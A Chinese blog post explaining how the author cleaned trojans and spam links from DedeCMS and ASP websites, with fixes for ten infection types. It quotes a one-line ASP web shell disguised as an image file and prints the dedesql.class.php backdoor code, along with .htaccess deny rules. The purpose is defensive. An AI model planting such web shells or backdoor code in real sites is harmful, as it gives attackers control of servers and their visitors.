网站被挂马挂黑链处理教程

众所周之，织梦的开源程序在企业站或门户站中占有很大地位，其以自身强大功能及上手快，操作易的特点， 使得不少初学者纷纷选择此程序来搭建自己的网站站点。然而，正是因为如此多的的人使用此程序，也使得不少黑客利用其程序本身漏洞，入侵站长网站，挂黑链，发布病毒，种植木马，令广大织梦站长们苦不堪言，那么，飞鹿日志是怎样解决问题的呢?
　　刚开始，飞鹿也曾很傻的认为，打上补丁，删除木马文件，就可以解决此问题，然而，事实上，黑客已经将病毒文件散布到不同的文件夹上，虽然飞鹿优化根据日期来判断哪些是黑客放上去的木马程序，然后删掉，但文件夹着实太多，没法全部清理掉。于是，飞鹿优化也不去一一查看什么木马文件了，直接下了一个最新版的织梦程序，重新安装了一遍，然后将之前备份好的数据库，重新还原上去，这样的话，一个全新的没有木马的程序就诞生了。如果你认为现在你的网站已经安全了，那就大错特错，虽然是最新版的，但飞鹿优化研究过了，依然是有漏洞的。有几个特别要注意的木马，飞鹿优化也曾中招过，下面将详讲解决办法。

挂马类型及解决方式：

　　1、90sec.php木马
　　我想这个木马程序，凡是用过织梦程序且中过该木马的站长们，应该都不陌生，此木马极其难缠，删了，第二天又会出现，这是因为没有找到根本原因所在，具体解决办法是在include/dedesql.class.php 找到$v2 .= chr($arrs2[$i]); 将其注释掉。
　　if(isset($GLOBALS[‘arrs1’]))
　　{
　　$v1 = $v2 = ”;
　　for($i=0;isset($arrs1[$i]);$i++)
　　{
　　$v1 .= chr($arrs1[$i]);
　　}
　　for($i=0;isset($arrs2[$i]);$i++)
　　{
　　// $v2 .= chr($arrs2[$i]); //注释这里
　　}
　　$GLOBALS[$v1] .= $v2;
　　}
　　2、数据库下的tplcache缓存文件
　　这个文件夹里也是木马程序的常驻基地，也是删了又挂，挂了又删，飞鹿优化的解决方法就，把data数据库的写入权限给关了，具体方法是，dedecms的程序是php，所以我们用的空间一般都自带的有一个.htaccess，这是一个配置文件， 其中，网站的301重定向、404错误页面、允许/阻止特定的用户或者目录的访问、禁止目录列表等功能都能在这里面实现，具体的操作写法是，打开这个文件之后，输入以下命令保存即可。
　　RewriteEngine on RewriteCond % !^$
　　RewriteRule uploads/(.*).(php)$ [F]
　　RewriteRule data/(.*).(php)$ [F]
　　RewriteRule templets/(.*).(php)$ [F]
　　3、DedeCMS 5.7 SQL注入漏洞
　　这个漏洞，飞鹿优化的网站倒是没有被利用过，只是用安全联盟检查出有该漏洞，这个漏洞已经引起360安全的注意，呼吁广大站长赶紧打补丁。

 4、 简单挂马
        首页被挂马，登录网站后，杀毒软件报警，检查后，发现首页index.asp检查，底部出现，清理掉后，页面即正常，这种挂马主要以直接修改首页文件为主，容易发现和清理。

   5、 网页后门挂马
         登录网站任何页面都出现杀毒报警，按之前的方法查看index.asp，并且去掉了iframe语句。但却发现问题依然存在，于是查看其他文件才发现，所有文件全部加上了挂马语句，即使恢复了首页，但用户访问其他页面的时候依然会蹦出病毒提示。采用备份文件覆盖恢复，重装操作系统等方法都实验以后，隔天后可能再出现被挂马的情况，此时应怀疑属于网页后门导致，于是检查所有asp程序文件，攻击者往往会采用一些双扩展名的文件存放在，例如图片目录当中，xxxx.jpg.asp文件，打开来看代码类似于<%execute request(“sb”)%> 这样的语句，明显是一句话后门，从文件名来判断，这种伪装图片的后缀上来的文件，应怀疑是提交图片功能存在上传漏洞，建议停用或者采用云锁进行过滤和检查网页木马。

  6、 数据库挂马
        访问首页病毒报警，全盘查找，没有发现首页和其他文件被篡改，如果对比所有文件的md5，发现文件没有任何篡改的迹象，也就是说文件还是那些文件，为啥会出现挂马页面呢?可以考虑检查数据库中表单是否被挂马，网页木马并没有挂在文件里，而是挂在数据库内容里。原理是首页调用活动新闻的时候，从数据库里读出表单内容，形成网页，因此读取的地方被插入了挂马语句，通过日志分析可以看到类似sql注入漏洞的log。
可能最初会有一些探测语句。
从此判断应该是news.asp存在注入问题，因此加入对变量类型判断和关键字过滤等工作，再将数据库中的挂马字段进行修改。可用云锁轻松拦截这些语句。

    7、 文件调用挂马
        应查看被调用的其他页面，常见的conn.asp等被包含的文件，有可能被插入后门，为啥修改这一个文件就能这么大威力呢?因为所有页面都调用了这个文件来连接数据库。文件可能会包含数据库的ip端口用户名及密码。此时应对数据库进行检查，例如数据库日志寻找一下是否有类似执行master..xp_cmdshell的记录，攻击者可能利用该扩展功能执行了系统命令来修改了文件，建议修改数据库口令，把数据库权限降到pubilc。将1433端口利用ipsec进行屏蔽，只允许本机访问。用云锁的防火墙功能进行拦截，并且可以扫描出被挂马的文件。

 8、 arp挂马
        用户反映访问网站的时候，杀毒软件提示病毒，但是登录服务器自己访问https://www.fdeer.com或本地ip，却没有发现被挂马，但是所有用户通过域名去访问，就会有提示，可以通过服务器上进行抓包分析，检查是否能发现大量arp包，这种arp包通常是将服务器的mac地址转向另一个ip，利用arp协议进行挂马，这种情况的花需要在交换机上进行mac和ip地址绑定，在交换机上进行配置以后。

   9、 域名劫持挂马
        直接在服务器通过ip访问就正常，用户通过域名访问就是提示有病毒，此时ping 自己网站域名的时候，如果显示的ip和真实的不一样，需要赶紧查看域名解析是否被修改，登录域名管理后台，修改为正常的，并且修改管理密码。

  10、 后台程序挂马
         更新网页的后台程序，一般会使用一些熟悉的路径。
        这种后台程序的链接虽然不公开给用户，但是经常容易被猜到，那么这种情况下，后台的用户名密码可以利用暴力破解的工具来穷举，理论上说破解只是时间问题，攻击者登录后台以后，就可以很方便的直接修改内容进行挂马，往往修改后台地址路径是个很费劲的工作，因为修改路径以后还需要考虑调整其他相关的程序，路径都要改成一致，可以利用重定向功能完成。

        以上，便是飞鹿日志遇到的一些木马程序，以及解决办法。除了以上办法，飞鹿优化还将数据的位置更换了，然后删除了一些dede官方发布出来的一些必删的文件，具体的可以去dede官网查看。当然，备份数据库，查杀病毒已经成为了飞鹿优化的每天必备工作，也希望广大站长们也都要养成备份的好习惯，千万别报侥幸心理!